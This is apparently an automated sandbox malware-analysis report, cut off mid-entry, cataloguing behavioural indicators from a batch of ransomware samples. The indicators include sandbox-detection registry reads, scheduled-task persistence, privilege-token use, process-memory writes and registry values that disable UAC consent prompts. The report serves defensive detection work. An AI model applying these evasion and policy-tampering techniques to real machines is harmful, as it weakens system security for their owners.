\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Blocker.gen-977f77728f1783062f8c072096f0b7535ec74f686c3e40db5dc78766edabffeb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Encoder.gen-57cc7951edcd2b8d3836e7f700955a9ba490bd416a481b9c86c036a55d256954.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UDS-Trojan-Ransom.Win32.Gen.vyw-78853ae45dc992cf465f9d101db3649311bbd1d11d60d63d12d5cdf1794c734a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Crypren.ahjz-4ebfdf556994b367b8a5f53c8a2caa968a4b04c1c36ce3f0ba4490db8d5b17cb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.DoppelPaymer.vho-8971ac708df78f14e3f21c7094d80616195eb46f912cf6d4e72d5eebf9fac865.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5180 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 3704 timeout.exe 5424 timeout.exe 5352 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Kills process with taskkill 2 IoCs
pid Process 1652 taskkill.exe 6436 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Internet Explorer\IESettingSync VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133746065609474912" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4050598569-1597076380-177084960-1000\{674475E0-D7CA-429E-891F-644EEF64EC44} chrome.exe Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 5504 reg.exe 3044 reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 7672 NOTEPAD.EXE -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5180 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7932 schtasks.exe 6656 schtasks.exe 5860 schtasks.exe 6020 schtasks.exe 820 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 1668 powershell.exe 1668 powershell.exe 1668 powershell.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 4248 7zFM.exe 4268 taskmgr.exe 3856 UDS-Trojan-Ransom.Win32.Encoder-37942f7c03a7895189861f7dede0844b359baa7aab0651ac0f2700b0d576a678.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 652 Process not Found 652 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 5964 chrome.exe 5964 chrome.exe 5964 chrome.exe 5964 chrome.exe 5964 chrome.exe 5964 chrome.exe 7896 msedge.exe 7896 msedge.exe 7896 msedge.exe 7896 msedge.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 5960 aspnet_wp.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 4248 7zFM.exe Token: 35 4248 7zFM.exe Token: SeSecurityPrivilege 4248 7zFM.exe Token: SeDebugPrivilege 4636 taskmgr.exe Token: SeSystemProfilePrivilege 4636 taskmgr.exe Token: SeCreateGlobalPrivilege 4636 taskmgr.exe Token: SeDebugPrivilege 4268 taskmgr.exe Token: SeSystemProfilePrivilege 4268 taskmgr.exe Token: SeCreateGlobalPrivilege 4268 taskmgr.exe Token: 33 4636 taskmgr.exe Token: SeIncBasePriorityPrivilege 4636 taskmgr.exe Token: SeDebugPrivilege 1668 powershell.exe Token: SeDebugPrivilege 2460 HEUR-Trojan-Ransom.MSIL.Blocker.gen-c83f6f4d1ab5f7d04cff339f90501abdbce3736476d747fb77dc2c9332c5ed39.exe Token: 33 3720 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 3720 AUDIODG.EXE Token: SeBackupPrivilege 5948 reg.exe Token: SeDebugPrivilege 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: SeIncBasePriorityPrivilege 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe Token: 33 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4248 7zFM.exe 4248 7zFM.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4636 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe 4268 taskmgr.exe -
Suspicious use of SetWindowsHookEx 16 IoCs
pid Process 2556 Trojan-Ransom.Win32.Crypren.ahjz-4ebfdf556994b367b8a5f53c8a2caa968a4b04c1c36ce3f0ba4490db8d5b17cb.exe 3856 UDS-Trojan-Ransom.Win32.Encoder-37942f7c03a7895189861f7dede0844b359baa7aab0651ac0f2700b0d576a678.exe 2572 Trojan-Ransom.Win32.Blocker.mvjg-586cb47c31583a8cd32e6797016106dfbdc0b56554fc4b66d17528580a086835.exe 2572 Trojan-Ransom.Win32.Blocker.mvjg-586cb47c31583a8cd32e6797016106dfbdc0b56554fc4b66d17528580a086835.exe 2572 Trojan-Ransom.Win32.Blocker.mvjg-586cb47c31583a8cd32e6797016106dfbdc0b56554fc4b66d17528580a086835.exe 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe 3856 UDS-Trojan-Ransom.Win32.Encoder-37942f7c03a7895189861f7dede0844b359baa7aab0651ac0f2700b0d576a678.exe 7376 HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe 7376 HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe 3856 UDS-Trojan-Ransom.Win32.Encoder-37942f7c03a7895189861f7dede0844b359baa7aab0651ac0f2700b0d576a678.exe 3856 UDS-Trojan-Ransom.Win32.Encoder-37942f7c03a7895189861f7dede0844b359baa7aab0651ac0f2700b0d576a678.exe 3856 UDS-Trojan-Ransom.Win32.Encoder-37942f7c03a7895189861f7dede0844b359baa7aab0651ac0f2700b0d576a678.exe 3856 UDS-Trojan-Ransom.Win32.Encoder-37942f7c03a7895189861f7dede0844b359baa7aab0651ac0f2700b0d576a678.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4636 wrote to memory of 4268 4636 taskmgr.exe 98 PID 4636 wrote to memory of 4268 4636 taskmgr.exe 98 PID 1668 wrote to memory of 3280 1668 powershell.exe 104 PID 1668 wrote to memory of 3280 1668 powershell.exe 104 PID 3280 wrote to memory of 2460 3280 cmd.exe 105 PID 3280 wrote to memory of 2460 3280 cmd.exe 105 PID 3280 wrote to memory of 2460 3280 cmd.exe 105 PID 3280 wrote to memory of 1096 3280 cmd.exe 106 PID 3280 wrote to memory of 1096 3280 cmd.exe 106 PID 3280 wrote to memory of 1096 3280 cmd.exe 106 PID 3280 wrote to memory of 3304 3280 cmd.exe 107 PID 3280 wrote to memory of 3304 3280 cmd.exe 107 PID 3280 wrote to memory of 3304 3280 cmd.exe 107 PID 3280 wrote to memory of 4712 3280 cmd.exe 108 PID 3280 wrote to memory of 4712 3280 cmd.exe 108 PID 3280 wrote to memory of 4712 3280 cmd.exe 108 PID 3280 wrote to memory of 3492 3280 cmd.exe 109 PID 3280 wrote to memory of 3492 3280 cmd.exe 109 PID 3280 wrote to memory of 3492 3280 cmd.exe 109 PID 3280 wrote to memory of 4168 3280 cmd.exe 110 PID 3280 wrote to memory of 4168 3280 cmd.exe 110 PID 3280 wrote to memory of 4168 3280 cmd.exe 110 PID 4712 wrote to memory of 3224 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 113 PID 4712 wrote to memory of 3224 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 113 PID 4712 wrote to memory of 3224 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 113 PID 3280 wrote to memory of 2384 3280 cmd.exe 112 PID 3280 wrote to memory of 2384 3280 cmd.exe 112 PID 3280 wrote to memory of 2384 3280 cmd.exe 112 PID 3280 wrote to memory of 1272 3280 cmd.exe 117 PID 3280 wrote to memory of 1272 3280 cmd.exe 117 PID 3224 wrote to memory of 3704 3224 cmd.exe 120 PID 3224 wrote to memory of 3704 3224 cmd.exe 120 PID 3224 wrote to memory of 3704 3224 cmd.exe 120 PID 3280 wrote to memory of 3388 3280 cmd.exe 121 PID 3280 wrote to memory of 3388 3280 cmd.exe 121 PID 3280 wrote to memory of 692 3280 cmd.exe 123 PID 3280 wrote to memory of 692 3280 cmd.exe 123 PID 3280 wrote to memory of 692 3280 cmd.exe 123 PID 3280 wrote to memory of 1736 3280 cmd.exe 124 PID 3280 wrote to memory of 1736 3280 cmd.exe 124 PID 3280 wrote to memory of 1736 3280 cmd.exe 124 PID 3280 wrote to memory of 2572 3280 cmd.exe 125 PID 3280 wrote to memory of 2572 3280 cmd.exe 125 PID 3280 wrote to memory of 2572 3280 cmd.exe 125 PID 3280 wrote to memory of 2556 3280 cmd.exe 126 PID 3280 wrote to memory of 2556 3280 cmd.exe 126 PID 3280 wrote to memory of 2556 3280 cmd.exe 126 PID 3280 wrote to memory of 116 3280 cmd.exe 127 PID 3280 wrote to memory of 116 3280 cmd.exe 127 PID 3280 wrote to memory of 1944 3280 cmd.exe 128 PID 3280 wrote to memory of 1944 3280 cmd.exe 128 PID 3280 wrote to memory of 1944 3280 cmd.exe 128 PID 692 wrote to memory of 3308 692 HEUR-Trojan-Ransom.Win32.Locky.gen-70320b438e8e14c531d6a889ef743ffe47c3d71e088316ff7b18269b6ed7ce81.exe 129 PID 692 wrote to memory of 3308 692 HEUR-Trojan-Ransom.Win32.Locky.gen-70320b438e8e14c531d6a889ef743ffe47c3d71e088316ff7b18269b6ed7ce81.exe 129 PID 692 wrote to memory of 3308 692 HEUR-Trojan-Ransom.Win32.Locky.gen-70320b438e8e14c531d6a889ef743ffe47c3d71e088316ff7b18269b6ed7ce81.exe 129 PID 3280 wrote to memory of 3184 3280 cmd.exe 130 PID 3280 wrote to memory of 3184 3280 cmd.exe 130 PID 3280 wrote to memory of 2456 3280 cmd.exe 131 PID 3280 wrote to memory of 2456 3280 cmd.exe 131 PID 3280 wrote to memory of 2456 3280 cmd.exe 131 PID 2456 wrote to memory of 1500 2456 Trojan-Ransom.Win32.Gen.znw-184a6995706e71b75a539af48cb11c75a73dd33fed1793cc2cb4696ca46b96cc.exe 134 PID 2456 wrote to memory of 1500 2456 Trojan-Ransom.Win32.Gen.znw-184a6995706e71b75a539af48cb11c75a73dd33fed1793cc2cb4696ca46b96cc.exe 134 PID 2456 wrote to memory of 1500 2456 Trojan-Ransom.Win32.Gen.znw-184a6995706e71b75a539af48cb11c75a73dd33fed1793cc2cb4696ca46b96cc.exe 134 PID 1736 wrote to memory of 956 1736 Trojan-Ransom.Win32.Blocker.mexm-ce45c43092d500d0aa3a23aa20faacebbc45ee13a99f48efaca6d80c1528e5b2.exe 137 -
System policy modification 1 TTPs 13 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Setup-Siemens.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Setup-Siemens.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters Setup-Siemens.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters\AllowEncryptionOracle = "2" Setup-Siemens.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning = "1" Setup-Siemens.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System Setup-Siemens.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "1" Setup-Siemens.exe Set value (int) 